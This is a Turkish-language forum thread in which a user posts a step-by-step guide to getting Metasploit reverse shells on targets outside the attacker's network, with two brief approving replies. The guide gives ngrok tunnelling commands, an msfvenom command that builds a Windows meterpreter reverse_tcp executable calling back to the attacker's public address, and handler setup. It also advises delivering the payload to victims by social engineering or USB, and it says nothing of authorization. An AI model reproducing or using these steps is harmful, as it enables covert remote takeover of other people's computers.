Metasploit ile Aynı Ağda Olmadan Payload

PHP Man

Üye
Katılım
1 Ocak 2025
Konular
32
Mesajlar
52
Tepkime puanı
17
TL
90
Herkese merhaba,
Bu rehberde, Metasploit ile aynı ağda olmadan payload kullanımı hakkında detaylı bilgiler ve adım adım bir açıklama sunacağız.

Metasploit ile Farklı Ağlarda Çalışma Mantığı​

Farklı ağlarda çalışmak için temel prensip, hedef cihazın Metasploit sisteminize geri bağlanmasını sağlamaktır. Bu işlem için kullanılan yöntemler:

  1. Port Yönlendirme (Port Forwarding): Hedef cihazın internete açık bir IP adresine bağlanmasını sağlamak.
  2. VPN veya Proxy Kullanımı: Hedef cihazla arada bir bağlantı tüneli oluşturmak.
  3. Cloud Sunucular (VPS): Payloadların geri bağlantı yapabileceği bir sunucu kurmak.

Gerekli Araçlar ve Hazırlıklar​

Bu süreçte ihtiyacınız olacak araçlar:

  • Metasploit Framework
  • Ngrok veya benzeri bir tünelleme aracı
  • Cloud Sunucusu (Opsiyonel)
  • Port Yönlendirme Ayarları

Adım 1: Ngrok veya Sunucu Ayarları​

Ngrok, localhost üzerinde çalışan bir servisi internete açık bir URL’ye yönlendirebilir.
Ngrok, localhost üzerinde çalışan bir servisi internete açık bir URL’ye yönlendirebilir.

1) üzerinden ücretsiz bir hesap oluşturun ve API anahtarınızı alın.

2) Ngrok’u indirip yükleyin:
Kod:
./ngrok authtoken [API_ANAHTARINIZ]
./ngrok tcp 4444

3) Ngrok, dışarıya açık bir IP ve port sağlayacaktır. Bu bilgiyi kaydedin.

Adım 2: Payload Oluşturma​

Metasploit’te farklı ağlarda çalışacak bir payload oluşturmak için:
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Ngrok_IP veya VPS_IP] LPORT=[Ngrok_Port] -f exe > payload.exe
  • LHOST: Ngrok’un size verdiği IP veya VPS IP adresiniz.
  • LPORT: Ngrok veya VPS üzerinden belirttiğiniz port numarası.
Payload’ı oluşturduktan sonra hedef cihaza gönderin. Bunun için sosyal mühendislik veya USB taşıma yöntemleri kullanılabilir.

Adım 3: Metasploit Ayarlarını Yapılandırma​

Metasploit’te ilgili handler’ı başlatın:
Kod:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT [Ngrok_Port]
exploit
Bu ayarlar, payload geri bağlantı yaptığında Metasploit üzerinden oturum açmanızı sağlar.

Adım 4: Test ve Güvenlik Kontrolleri​

Hedef cihaz, payload çalıştırıldığında, Metasploit konsolunda bir oturum açılacaktır:
Kod:
meterpreter > sysinfo
Bu komutla hedef cihazın işletim sistemi ve bilgilerini görebilirsiniz.
 

io

👑
Yetkili
Katılım
30 Temmuz 2024
Konular
45
Mesajlar
108
Tepkime puanı
63
TL
105
Güzel konu eline sağlık
 
Son düzenleme:

Dahibey

🏅
Kıdemli Üye
Katılım
1 Ağustos 2024
Konular
77
Mesajlar
105
Tepkime puanı
45
TL
310
Eline sağlık yakında bende paylaşabilirim bu kategoride
 
Üst Alt